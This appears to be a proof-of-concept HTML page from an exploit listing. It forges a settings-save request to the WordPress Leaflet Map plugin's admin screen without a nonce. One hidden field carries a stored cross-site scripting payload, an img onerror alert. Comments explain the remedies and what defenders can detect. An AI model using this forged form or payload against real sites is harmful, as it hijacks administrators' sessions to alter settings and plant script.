## https://sploitus.com/exploit?id=WPEX-ID:AC32D265-066E-49EC-9042-3145CD99E2E8
<!--
  Proof-of-concept page for a cross-site request forgery (CSRF) check against
  the WordPress admin settings screen addressed by page=leaflet-map.
  example.com is a placeholder host, not a real target.

  What the markup demonstrates:
  - A third-party page can assemble the complete settings POST for that screen.
  - None of the fields is an anti-CSRF token. WordPress settings forms normally
    carry a _wpnonce field, and no such field is present here.
    NOTE(review): presumably the affected plugin version saved these settings
    without verifying a nonce; confirm against the advisory linked above.
  - One field (default_attribution) carries HTML with an event handler, so a
    forged save would also store markup that may later be rendered as-is.

  What a maintainer should check in the save handler:
  - Nonce verification (check_admin_referer() or wp_verify_nonce()) together
    with a capability check (current_user_can()) before any option is written.
  - Sanitising on save, for example wp_kses() limited to the tags an
    attribution string needs, and escaping on output.
  - Validation of every setting on this form, not only the attribution field.

  What a defender can look for:
  - POST requests to this admin page whose Origin or Referer header is not the
    site itself.
  - Stored plugin options that contain event-handler attributes such as onerror.
-->
<html>
  <body>
    <!-- State-changing request built outside the site. It is sent only when the
         button at the bottom is pressed. wp-admin requires a logged-in session,
         so the request only has effect in a browser that is already
         authenticated with rights to this settings page (TODO confirm the
         required capability). -->
    <form action="https://example.com/wp-admin/admin.php?page=leaflet-map" method="POST">
      <!-- Map display settings. The values look like ordinary settings-screen
           values (TODO confirm they are the plugin defaults). -->
      <input type="hidden" name="default_lat" value="44.67" />
      <input type="hidden" name="default_lng" value="-63.61" />
      <input type="hidden" name="default_zoom" value="12" />
      <input type="hidden" name="default_height" value="250" />
      <input type="hidden" name="default_width" value="100%" />
      <input type="hidden" name="default_min_zoom" value="0" />
      <input type="hidden" name="default_max_zoom" value="20" />
      <input type="hidden" name="default_tiling_service" value="other" />
      <input type="hidden" name="mapquest_appkey" value="Supply an API key if you choose MapQuest" />
      <input type="hidden" name="map_tile_url" value="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" />
      <input type="hidden" name="map_tile_url_subdomains" value="abc" />
      <input type="hidden" name="tilesize" value="" />
      <input type="hidden" name="mapid" value="" />
      <input type="hidden" name="accesstoken" value="" />
      <input type="hidden" name="zoomoffset" value="" />
      <input type="hidden" name="js_url" value="https://unpkg.com/leaflet@1.7.1/dist/leaflet.js" />
      <input type="hidden" name="css_url" value="https://unpkg.com/leaflet@1.7.1/dist/leaflet.css" />
      <!-- Marker payload: an img element with no source and an onerror handler
           that calls alert(). It is a harmless indicator that markup in this
           setting would execute if it were stored and later written into a page
           without escaping.
           NOTE(review): where the plugin renders this value is not shown on
           this page; verify the output path and its escaping. -->
      <input type="hidden" name="default_attribution" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="geocoder" value="osm" />
      <input type="hidden" name="google_appkey" value="Supply a Google API Key" />
      <input type="hidden" name="togeojson_url" value="https://unpkg.com/@mapbox/togeojson@0.16.0/togeojson.js" />
      <!-- Mirrors the name and value of the settings form's own save button. -->
      <input type="hidden" name="submit" value="Save Changes" />
      <!-- The only visible control; nothing is submitted until it is pressed. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>